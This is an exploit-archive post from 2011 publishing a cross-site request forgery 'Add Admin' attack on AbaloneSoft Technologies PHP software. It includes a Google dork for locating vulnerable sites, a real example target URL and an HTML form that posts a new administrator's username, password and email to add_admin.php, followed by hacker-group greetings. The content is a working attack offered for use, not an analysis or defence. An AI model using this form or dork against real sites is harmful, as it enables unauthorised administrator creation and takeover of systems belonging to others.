Home / exploitsPDF  

AbaloneSoft Technologies Cross Site Request Forgery

Posted on 11 March 2011

###
# Title : AbaloneSoft Technologies CSRF Vulnerability (Add Admin)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Download : http://www.yuvajobs.com/download-Abalonesoft+Technologies-placement-papers
# platform : php
# Impact : Add Admin
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# Go0gle Dork : " Powered by  AbaloneSoft Technologies "
###


# Demo : http://[Target]/[Path]/html/admin/add_admin.html

# Example : http://www.odolyss.com/html/admin/add_admin.html

==================[ HTML CODE ]====================

***************************************************


<script language="javascript" type="text/javascript" src="http://[LocalHost]/../js/admin/checkadmin.js"></script>

<form id="add_admin" name="add_admin" method="post" action="add_admin.php">

<td width=100% height="100%"  valign=top>
<table width="100%" height="50%" class="innertable" border="0" align="center" cellpadding="1" cellspacing="1">
<tr colfont="4"  height=10><td></td></tr>
<tr>
<td valign="top">



<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<td width="1%" valign="top" style="padding-left:5px;">				   </td>
<TD width="99%" valign="top"  style="padding-left:10px;" align="top" >
<table width="100%" border="0" cellspacing="1" cellpadding="0" vspace="0"  class="border"  align="center"  >
<tr>
<td  valign="top"><table width="100%" border="0" cellspacing="1" cellpadding="0"  >
<!--<tr>      <td align="center" height="5"  colspan="2">&nbsp;</td>    </tr>-->
<tr >
<td colspan="3" height="19"  style="padding-left:5px" class="tdbg">Add User </td>

</tr>
<tr>
<td align="center" height="5"  colspan="3">&nbsp;</td>
</tr>
<tr>
<td height="1" colspan="3" class="blacktext" ></td>
</tr>
<tr >
<td height="10" colspan="3" valign="middle" class="normal_text"><span class="asterisk">*  Field is mandatory</span></td>

</tr>
<!--<tr>
<td width="50%" colspan="2" class="normal_text" align="left" style="padding-bottom:5px; padding-left:300px;"><font color="#E66F17"><?=$msg?> </font></td>
</tr>-->
<tr>
<td height="41" colspan="3" style="padding-left:400px" class="error_text"><?=$msg_admin?><?=$errorMessage;?>
<?=$oldperror?></td>
</tr>
<tr>
<td width="50%"  align="right" class="normal_text" style="left:200px"> User Name : </td>

<td width="25%"><input name="txtuser" type="text" id="txtuser" regexp="JSVAL_RX_FC" value="<?= $adminName; ?>" required=1 err="Please enter admin name." class="textbox1" />
<font color="#FF0000">*</font>
<!-- <span class="catagories">*</span>-->
<input name="adminid" type="hidden" value="<?=$id?>" /></td>
<td width="25%"><div id="erruser" name="erruser"  class="error_text"></div></td>
</tr>
<tr>
<td height="31" align="right" class="normal_text">New Password : </td>

<td><input type="password" name="txtnpass" id="txtnpass" required="1" err="Please enter new password." regexp="JSVAL_RX_PS"class="textbox1"/>
<font color="#FF0000">*</font>
<!--<span class="catagories">&nbsp;*</span>--></td>
<td><div id="errpass" name="errpass"  class="error_text"></div></td>
</tr>
<tr>
<td height="31" align="right" class="normal_text">Conform Password : </td>
<td><input type="password" name="txt_cpass"  minlength="5" required="1" err="Please enter valid password." regexp="JSVAL_RX_PS"  class="textbox1" id="txt_cpass" />

<font color="#FF0000">*</font>
<!--<span class="catagories">&nbsp;*</span>--></td>
<td><div id="errcpass" name="errcpass"  class="error_text"></div></td>
</tr>
<tr>
<td align="right" class="normal_text">E-mail ID : </td>
<td><input name="txt_email" type="text" id="txt_email" class="textbox1" value="<?= $adminMail?>" required=1 err="Please enter valid e-mail address." regexp="JSVAL_RX_NEWEMAIL" />
<font color="#FF0000">*</font>

<!--<span class="catagories">&nbsp;*</span>--></td>
<td><div id="errmail" name="errmail"  class="error_text"></div></td>
</tr>
<tr>
<td height="5"></td>
</tr>
<tr>
<td align="right"><input type="hidden" name="Submit" value="Submit" /></td>
<td colspan="2" style="padding-left:25px;"><input type="button"  class="button" name="Submit" value="Submit" onclick="allval();" /></td>

</tr>
<tr>
<td height="7"></td>
</tr>
</table></td>
</tr>
</table>
</TD></tr></table>
<!------------------- content end here ----------------------->
</td></tr></table>
</form>
</td>
</tr>
</td>
</tr>
</table>

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
# Greets All Bad Boys (cité 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================

 

TOP

Malware :

Exploits :